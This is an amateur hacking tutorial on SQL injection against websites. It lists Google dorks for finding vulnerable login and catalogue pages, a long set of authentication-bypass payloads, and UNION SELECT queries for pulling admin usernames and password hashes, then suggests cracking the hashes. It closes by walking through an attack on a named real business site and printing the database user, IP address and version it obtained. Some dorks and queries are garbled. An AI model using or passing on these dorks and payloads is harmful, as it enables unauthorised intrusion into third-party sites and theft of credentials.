[ SQL INJECTION TUT ]

-----------------------------------------------------------

SQL = Structured Query Language

-----------------------------------------------------------

SQL INJECTION = A injecting sql queries into another database or using queries to get auth bypass as an admin.

-----------------------------------------------------------

..::BASIC SQL INJECTION::..

Auth Bypass, Most .ASP websites are vulnerable to it. This method is pretty old but still many websites are Vulnerabe to this method.


First we need 2 find a site, start by opening google. With the help of Dorks.


"defenition of dork" 'a search entry for a certain type of site/exploit .ect"

There are many dorks... Some are below

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

type the above any dork in Google, and start finding sites( you will get many websites ).
Now the Admin control panel will be asking Username and Password.

we will use or SQL injections...
list of few sql injections is given below

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

It's confusing, in simple your INPUT should be like this :

Username : Admin
Password : 'or'1'='1

So click submit and you'r in
"NOTE" not all sites are vulnerable.


-------------------------------------------------------------


SQL Injection Queries to Extract The Information from Website

ok so lets say we have a site :
http://www.yourtargetwebsitex.com/index.php?catid=1
there is a list of dork 4 sites like this

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurlgl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=

"Note" : these are few dorks just for Example ::.
Also yu can use this ;

"inurl:".php?catid=" site:xxx" ; site:xxx , in xxx you will put your target website forexample "inurl:".php?catid=" site:direct.gov.uk"

So once you have you'r site

http://www.yourtargetwebsite.com/index.php?catid=1
now we add a ' to the end of the url
so the site is
http://www.yourtargetwebsite.com/index.php?catid=1'
if there is an error of some sort then it is vulnerable
now we need to find the number of columns in the sql database
so we type
http://www.yourtargetwebsite.com/index.php?catid=1 order by 1-- "no error"
http://www.yourtargetwebsite.com/index.php?catid=1 order by 2-- "no error"
http://www.yourtargetwebsite.com/index.php?catid=1 order by 3-- "no error"
http://www.yourtargetwebsite.com/index.php?catid=1 order by 4-- "no error"
http://www.yourtargetwebsite.com/index.php?catid=1 order by 5-- "error"

so this database has 4 columns because we got an error on 5
on some databases there is 2 columns and on some 200 it varies
so once we have the column number.
we try the union function
http://www.yourtargetwebsite.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
so now we need to info about the db
so lets say the numbers 2 and 4 showed up on the screen
so i will use my query on 2
http://www.yourtargetwebsite.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4--
the db type and version will pop up on the screen
if the db version is 4 or lower then to extract the password you will need these queries
http://www.yourtargetwebsite.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58), table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
this should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
then type
http://www.yourtargetwebsite.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),ta ble_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
then once u have the right table name you should get the administrator password
then just do the same thing but type username instead of password
sometimes the password is hashed and you need to crack it.
There are many MD5 crackers.
Next you want to find the admin panel, usually it is :

www.yourtargetsite.com/admin OR /administrator

now if the database is version 5 or up
type

http://www.yourtargetwebsite.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

and that will display a list of all the tables
once you have your table name
type the same thing as 4

http://www.yourtargetwebsite.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--

then the same with username
but now if it doesnt work far all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

-----------------------------------------------------------

for Ease, You can Download Hackbar , It's addon which makes your Injection query easier.

Download it at::.. :

https://addons.mozilla.org/en-US/firefox/addon/hackbar/


-----------------------------------------------------------

To find admin you can go here

http://tools.th3-0utl4ws.com/admin-finder/

-----------------------------------------------------------


There was a software Known as Exploit scanner, well its now patched , it was coded by ""Reliuke""

But there are Online scanner's which scan SQL vulnerable site for you.
Few are given below

http://webhosting.blackoutaio.com/~sqli/

SQLi Scanner

If you want to hack a Target website via SQL not any random, then you can also scan it by these above tools which are Online and work like a website by a Dork

Example

if you wanna hack website : Primus Camping :

and you want to FIND SQL error in it( so that after sql error you may hack it )
just do the following

in yur online SQL scanner i.e

http://webhosting.blackoutaio.com/~sqli/

Type your Dork with target website

inurlhp?=id+siterimuscamping.com


Invalid Query: select * from item where item_id = \'3 Error is: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'3' at line 1


and You got success Site has Hole ===>

Pages: [ 0 ]
Dork: [ inurlhp?=id+siterimuscamping.com ]
Scanning Google
Loadiing…
Primus Camping <== SQL Injection Success !

So further you can inject your target

-----------------------------------------------------------
Inj3ct1ng...

Primus Camping

No error

Primus Camping

0_o Error means it has 31 Columns...

Further by Union Function

Primus Camping

ok here I see vulnerable columns "5" 10... 0_o , so I am gonna Fuck " 10 "

Knowing Basic Information

Primus Camping

The information I get is ::..

db116472@205.186.176.14 : nagear_com_-_main : 5.1.26-rc-5.1.26rc

MySQL version : 5.1
Database : nagear_com_-_main
User : db116472@205.186.176.16
Inj3ct1ng further.... 0_o


Primus Camping
Tables ^^

Primus Camping